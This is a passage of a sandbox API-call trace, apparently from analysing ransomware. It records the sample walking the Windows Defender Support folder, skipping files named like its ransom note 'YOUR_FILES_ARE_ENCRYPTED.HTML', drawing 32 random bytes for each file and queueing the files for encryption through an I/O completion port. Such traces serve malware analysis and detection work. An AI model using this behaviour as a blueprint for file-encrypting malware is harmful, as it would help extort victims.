lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0107.778] WriteFile (in: hFile=0x31c, lpBuffer=0x3173dd8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x3173dd8*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0107.779] CloseHandle (hObject=0x31c) returned 1 [0107.780] GetProcessHeap () returned 0x600000 [0107.780] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0107.780] GetProcessHeap () returned 0x600000 [0107.780] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0107.781] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x82987280, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x82987280, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Support", cAlternateFileName="")) returned 1 [0107.781] StrStrIW (lpFirst="Support", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.781] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support") returned 53 [0107.781] GetProcessHeap () returned 0x600000 [0107.781] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0107.782] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support" [0107.782] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*" [0107.782] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x82987280, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x82987280, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0107.783] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x82987280, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x82987280, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="..", cAlternateFileName="")) returned 1 [0107.783] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd04c5003, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd04c5003, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x8436108b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x144, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="MPDetection-02112021-121950.log", cAlternateFileName="MPDETE~1.LOG")) returned 1 [0107.783] StrStrIW (lpFirst="MPDetection-02112021-121950.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.783] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPDetection-02112021-121950.log") returned 85 [0107.783] PathFindExtensionW (pszPath="MPDetection-02112021-121950.log") returned=".log" [0107.783] lstrlenW (lpString=".log") returned 4 [0107.783] PathFindExtensionW (pszPath="MPDetection-02112021-121950.log") returned=".log" [0107.783] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0107.783] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPDetection-02112021-121950.log" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mpdetection-02112021-121950.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0107.783] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=324) returned 1 [0107.784] CloseHandle (hObject=0x32c) returned 1 [0107.784] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd04c5003, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd04c5003, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x8436108b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x682, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="MPLog-02112021-121950.log", cAlternateFileName="MPLOG-~1.LOG")) returned 1 [0107.784] StrStrIW (lpFirst="MPLog-02112021-121950.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.784] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-02112021-121950.log") returned 79 [0107.784] PathFindExtensionW (pszPath="MPLog-02112021-121950.log") returned=".log" [0107.784] lstrlenW (lpString=".log") returned 4 [0107.784] PathFindExtensionW (pszPath="MPLog-02112021-121950.log") returned=".log" [0107.784] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0107.784] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-02112021-121950.log" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mplog-02112021-121950.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0107.784] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=1666) returned 1 [0107.790] GetProcessHeap () returned 0x600000 [0107.790] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x313b008 [0107.834] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="1A") returned 2 [0107.834] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="4C") returned 2 [0107.834] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="59") returned 2 [0107.835] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="16") returned 2 [0107.835] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="F0") returned 2 [0107.835] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="51") returned 2 [0107.835] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="8D") returned 2 [0107.835] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="55") returned 2 [0107.835] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="5C") returned 2 [0107.835] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="60") returned 2 [0107.835] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="19") returned 2 [0107.835] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="9E") returned 2 [0107.835] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="08") returned 2 [0107.835] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="B5") returned 2 [0107.835] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="A9") returned 2 [0107.835] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="72") returned 2 [0107.835] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="40") returned 2 [0107.835] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="A6") returned 2 [0107.835] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="21") returned 2 [0107.835] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="E9") returned 2 [0107.835] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="4A") returned 2 [0107.835] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="C1") returned 2 [0107.835] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="FE") returned 2 [0107.835] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="8B") returned 2 [0107.835] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="30") returned 2 [0107.835] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="1D") returned 2 [0107.835] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="67") returned 2 [0107.835] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="67") returned 2 [0107.835] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="A4") returned 2 [0107.835] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="05") returned 2 [0107.835] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="BD") returned 2 [0107.835] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="1E") returned 2 [0107.836] lstrcpyW (in: lpString1=0x314b0bc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-02112021-121950.log" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-02112021-121950.log") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-02112021-121950.log" [0107.836] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x313b008, NumberOfConcurrentThreads=0x0) returned 0x274 [0107.836] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x313b008, lpOverlapped=0x313b008) returned 1 [0107.836] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd0583c11, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd0583c11, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x29ae9595, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x9000, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="MpWppTracing-02112021-121950-00000003-ffffffff.bin", cAlternateFileName="MPWPPT~1.BIN")) returned 1 [0107.836] StrStrIW (lpFirst="MpWppTracing-02112021-121950-00000003-ffffffff.bin", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.837] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MpWppTracing-02112021-121950-00000003-ffffffff.bin") returned 104 [0107.837] PathFindExtensionW (pszPath="MpWppTracing-02112021-121950-00000003-ffffffff.bin") returned=".bin" [0107.837] lstrlenW (lpString=".bin") returned 4 [0107.837] PathFindExtensionW (pszPath="MpWppTracing-02112021-121950-00000003-ffffffff.bin") returned=".bin" [0107.837] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0107.837] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MpWppTracing-02112021-121950-00000003-ffffffff.bin" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mpwpptracing-02112021-121950-00000003-ffffffff.bin"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0107.837] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=36864) returned 1 [0107.837] GetProcessHeap () returned 0x600000 [0107.837] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x682358 [0107.841] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="FF") returned 2 [0107.841] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="89") returned 2 [0107.841] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="EB") returned 2 [0107.841] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="2A") returned 2 [0107.841] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="75") returned 2 [0107.841] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="04") returned 2 [0107.841] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="63") returned 2 [0107.841] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="23") returned 2 [0107.841] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="5A") returned 2 [0107.841] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="CA") returned 2 [0107.841] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="5F") returned 2 [0107.841] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="84") returned 2 [0107.841] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="80") returned 2 [0107.841] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="5A") returned 2 [0107.841] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="A0") returned 2 [0107.841] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="FD") returned 2 [0107.841] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="97") returned 2 [0107.841] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="F8") returned 2 [0107.841] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="D4") returned 2 [0107.841] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="89") returned 2 [0107.841] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="E6") returned 2 [0107.842] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="38") returned 2 [0107.842] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="8F") returned 2 [0107.842] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="AA") returned 2 [0107.842] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="8C") returned 2 [0107.842] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="B0") returned 2 [0107.842] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="F4") returned 2 [0107.842] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="77") returned 2 [0107.842] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="0F") returned 2 [0107.842] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="E5") returned 2 [0107.842] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="5E") returned 2 [0107.842] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="3D") returned 2 [0107.843] lstrcpyW (in: lpString1=0x69240c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MpWppTracing-02112021-121950-00000003-ffffffff.bin" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MpWppTracing-02112021-121950-00000003-ffffffff.bin") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MpWppTracing-02112021-121950-00000003-ffffffff.bin" [0107.843] CreateIoCompletionPort (FileHandle=0x310, ExistingCompletionPort=0x274, CompletionKey=0x682358, NumberOfConcurrentThreads=0x0) returned 0x274 [0107.843] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x682358, lpOverlapped=0x682358) returned 1 [0107.843] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x34952889, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34952889, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x63bd6e5a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xc000, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="MpWppTracing-02112021-122238-00000003-ffffffff.bin", cAlternateFileName="MPWPPT~2.BIN")) returned 1 [0107.843] StrStrIW (lpFirst="MpWppTracing-02112021-122238-00000003-ffffffff.bin", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.843] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MpWppTracing-02112021-122238-00000003-ffffffff.bin") returned 104 [0107.843] PathFindExtensionW (pszPath="MpWppTracing-02112021-122238-00000003-ffffffff.bin") returned=".bin" [0107.843] lstrlenW (lpString=".bin") returned 4 [0107.843] PathFindExtensionW (pszPath="MpWppTracing-02112021-122238-00000003-ffffffff.bin") returned=".bin" [0107.843] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0107.843] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MpWppTracing-02112021-122238-00000003-ffffffff.bin" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mpwpptracing-02112021-122238-00000003-ffffffff.bin"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0107.844] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=49152) returned 1 [0107.844] GetProcessHeap () returned 0x600000 [0107.844] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0107.848] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="C9") returned 2 [0107.848] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="7C") returned 2 [0107.848] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="08") returned 2 [0107.848] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="C5") returned 2 [0107.848] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="BD") returned 2 [0107.848] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="A6") returned 2 [0107.848] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="CA") returned 2 [0107.848] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="20") returned 2 [0107.848] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="87") returned 2 [0107.848] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="3D") returned 2 [0107.848] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="7E") returned 2 [0107.848] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="B2") returned 2 [0107.848] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="7E") returned 2 [0107.848] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="5C") returned 2 [0107.848] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="FE") returned 2 [0107.848] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="D4") returned 2 [0107.848] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="F3") returned 2 [0107.848] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="74") returned 2 [0107.848] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="D9") returned 2 [0107.848] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="DD") returned 2 [0107.848] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="26") returned 2 [0107.848] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="C9") returned 2 [0107.848] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="A5") returned 2 [0107.848] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="A9") returned 2 [0107.848] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="51") returned 2 [0107.849] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="D7") returned 2 [0107.849] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="57") returned 2 [0107.849] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="78") returned 2 [0107.849] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="2A") returned 2 [0107.849] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="C2") returned 2 [0107.849] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="C8") returned 2 [0107.849] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="75") returned 2 [0107.850] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MpWppTracing-02112021-122238-00000003-ffffffff.bin" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MpWppTracing-02112021-122238-00000003-ffffffff.bin") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MpWppTracing-02112021-122238-00000003-ffffffff.bin" [0107.850] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0107.850] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0107.850] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82987280, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x82987280, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8431498e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="MpWppTracing-02112021-124618-00000003-ffffffff.bin", cAlternateFileName="MPWPPT~3.BIN")) returned 1 [0107.850] StrStrIW (lpFirst="MpWppTracing-02112021-124618-00000003-ffffffff.bin", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.850] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MpWppTracing-02112021-124618-00000003-ffffffff.bin") returned 104 [0107.850] PathFindExtensionW (pszPath="MpWppTracing-02112021-124618-00000003-ffffffff.bin") returned=".bin" [0107.850] lstrlenW (lpString=".bin") returned 4 [0107.850] PathFindExtensionW (pszPath="MpWppTracing-02112021-124618-00000003-ffffffff.bin") returned=".bin" [0107.850] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0107.850] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MpWppTracing-02112021-124618-00000003-ffffffff.bin" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mpwpptracing-02112021-124618-00000003-ffffffff.bin"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0107.851] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=4096) returned 1 [0107.851] GetProcessHeap () returned 0x600000 [0107.851] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0107.853] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="84") returned 2 [0107.853] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="34") returned 2 [0107.854] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="DB") returned 2 [0107.854] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="D7") returned 2 [0107.854] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="3A") returned 2 [0107.854] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="69") returned 2 [0107.854] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="48") returned 2 [0107.854] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="FE") returned 2 [0107.854] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="33") returned 2 [0107.854] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="DB") returned 2 [0107.854] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="A0") returned 2 [0107.854] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="0A") returned 2 [0107.854] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="9A") returned 2 [0107.854] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="E0") returned 2 [0107.854] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="22") returned 2 [0107.854] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="77") returned 2 [0107.854] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="B9") returned 2 [0107.854] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="AD") returned 2 [0107.854] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="7A") returned 2 [0107.854] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="89") returned 2 [0107.854] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="8C") returned 2 [0107.854] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="B4") returned 2 [0107.854] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="83") returned 2 [0107.854] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="18") returned 2 [0107.854] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="54") returned 2 [0107.854] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="1C") returned 2 [0107.854] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="FC") returned 2 [0107.854] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="11") returned 2 [0107.854] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="1C") returned 2 [0107.854] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="5F") returned 2 [0107.854] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="78") returned 2 [0107.854] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="5F") returned 2 [0107.855] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows 